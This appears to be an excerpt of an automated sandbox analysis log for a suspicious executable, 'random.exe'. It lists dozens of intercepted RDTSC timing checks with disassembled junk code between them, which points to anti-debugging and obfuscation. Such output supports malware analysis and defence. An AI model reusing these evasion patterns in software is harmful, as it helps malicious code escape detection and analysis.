Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BA27E9 second address: BA289E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FBC8CB4EEE8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 pushad 0x00000027 add eax, 24A4AE23h 0x0000002d popad 0x0000002e push dword ptr fs:[00000000h] 0x00000035 mov ebx, dword ptr [ebp+122D1FEDh] 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 push ecx 0x00000043 movsx edi, di 0x00000046 pop ebx 0x00000047 mov edi, eax 0x00000049 mov eax, dword ptr [ebp+122D0D8Dh] 0x0000004f push 00000000h 0x00000051 push edi 0x00000052 call 00007FBC8CB4EEE8h 0x00000057 pop edi 0x00000058 mov dword ptr [esp+04h], edi 0x0000005c add dword ptr [esp+04h], 0000001Bh 0x00000064 inc edi 0x00000065 push edi 0x00000066 ret 0x00000067 pop edi 0x00000068 ret 0x00000069 jmp 00007FBC8CB4EEEDh 0x0000006e push FFFFFFFFh 0x00000070 jmp 00007FBC8CB4EEF2h 0x00000075 push eax 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 je 00007FBC8CB4EEE6h 0x0000007f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BA6D87 second address: BA6D9C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBC8CC0CD3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BA6D9C second address: BA6DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB0FE3 second address: BB0FE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB0FE8 second address: BB0FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB0FEE second address: BB100D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FBC8CC0CD44h 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB100D second address: BB1013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB1172 second address: BB11AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FBC8CC0CD46h 0x0000000c jmp 00007FBC8CC0CD48h 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB11AD second address: BB11D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FBC8CB4EEEDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FBC8CB4EEEFh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB11D2 second address: BB11D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB1335 second address: BB1345 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBC8CB4EEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB1345 second address: BB135D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC8CC0CD44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B47BA5 second address: B47BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC8CB4EEEFh 0x00000009 popad 0x0000000a jmp 00007FBC8CB4EEF9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB8745 second address: BB874C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB874C second address: BB876A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBC8CB4EEF0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB876A second address: BB878B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBC8CC0CD49h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB878B second address: BB87BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c je 00007FBC8CB4EEEEh 0x00000012 jp 00007FBC8CB4EEE8h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB87BF second address: BB87C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB8882 second address: BB88D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FBC8CB4EEEEh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 js 00007FBC8CB4EEFCh 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jnc 00007FBC8CB4EEE6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB88D3 second address: BB88DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB88DC second address: BB88E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB88E2 second address: BB8907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jmp 00007FBC8CC0CD47h 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB8A52 second address: BB8A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BB8A56 second address: BB8A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBDC76 second address: BBDC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBC8CB4EEE6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBDC87 second address: BBDCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FBC8CC0CD3Ch 0x0000000b jp 00007FBC8CC0CD36h 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 jne 00007FBC8CC0CD3Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBDDDF second address: BBDDFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC8CB4EEF8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBDF6D second address: BBDF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBDF73 second address: BBDF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC8CB4EEF6h 0x00000009 popad 0x0000000a jmp 00007FBC8CB4EEEFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBE0F1 second address: BBE0FB instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBC8CC0CD36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBE0FB second address: BBE119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FBC8CB4EEF8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBE26A second address: BBE26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBE26E second address: BBE272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBE3DD second address: BBE3E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBE3E1 second address: BBE3ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBE3ED second address: BBE3F7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBC8CC0CD36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBE3F7 second address: BBE42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007FBC8CB4EEE8h 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007FBC8CB4EEF5h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jmp 00007FBC8CB4EEECh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBE56A second address: BBE586 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD48h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBE84A second address: BBE865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEEBh 0x00000007 jmp 00007FBC8CB4EEECh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BBE865 second address: BBE883 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD49h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BC00C4 second address: BC00DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8D6A3 second address: B8D705 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBC8CC0CD3Ch 0x00000008 jbe 00007FBC8CC0CD36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dword ptr [ebp+122D2B7Eh], edi 0x00000019 lea eax, dword ptr [ebp+124713F9h] 0x0000001f mov dx, 7DCEh 0x00000023 nop 0x00000024 pushad 0x00000025 jmp 00007FBC8CC0CD3Dh 0x0000002a pushad 0x0000002b jc 00007FBC8CC0CD36h 0x00000031 js 00007FBC8CC0CD36h 0x00000037 popad 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d jbe 00007FBC8CC0CD36h 0x00000043 jmp 00007FBC8CC0CD46h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8D8D2 second address: B8D8E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8D8E0 second address: B8D8E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8DF72 second address: B8DF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8E151 second address: B8E155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8E155 second address: B8E15F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBC8CB4EEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8E15F second address: B8E165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8E165 second address: B8E176 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBC8CB4EEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BC427E second address: BC4291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBC8CC0CD3Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BC9675 second address: BC967B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BC967B second address: BC9687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FBC8CC0CD36h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BC97D4 second address: BC97DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BC97DA second address: BC97E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BC97E7 second address: BC9800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC8CB4EEF3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BC9800 second address: BC9814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FBC8CC0CD3Dh 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BC9985 second address: BC9990 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BCA135 second address: BCA13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BCA13B second address: BCA14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007FBC8CB4EEE8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BCA14D second address: BCA153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BCA153 second address: BCA157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BCA157 second address: BCA161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BD2592 second address: BD25B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC8CB4EEEFh 0x00000009 jg 00007FBC8CB4EEE6h 0x0000000f popad 0x00000010 je 00007FBC8CB4EEE8h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BD25B4 second address: BD25D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBC8CC0CD46h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BD25D0 second address: BD25D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BD25D4 second address: BD25EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jnl 00007FBC8CC0CD36h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BD25EA second address: BD25FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF0h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BD8460 second address: BD8466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BD7868 second address: BD786E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BD786E second address: BD7881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FBC8CC0CD36h 0x0000000d je 00007FBC8CC0CD36h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BD79A4 second address: BD79A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BD79A8 second address: BD79B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 js 00007FBC8CC0CD36h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BD79B8 second address: BD79E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBC8CB4EEF7h 0x0000000a jne 00007FBC8CB4EEE6h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BDE189 second address: BDE18F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BDE18F second address: BDE193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BDE193 second address: BDE197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BDDD78 second address: BDDD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BE22D7 second address: BE22EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jne 00007FBC8CC0CD36h 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BE22EA second address: BE230F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBC8CB4EEE6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBC8CB4EEF8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BE230F second address: BE2315 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BE1B8C second address: BE1BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FBC8CB4EEEFh 0x0000000b popad 0x0000000c jmp 00007FBC8CB4EEF3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BE1BB5 second address: BE1BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD41h 0x00000007 push esi 0x00000008 jnl 00007FBC8CC0CD36h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BE1BDA second address: BE1BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BE78FE second address: BE791B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007FBC8CC0CD3Dh 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BE7A6F second address: BE7A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BE7D5F second address: BE7D67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BE7D67 second address: BE7D6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
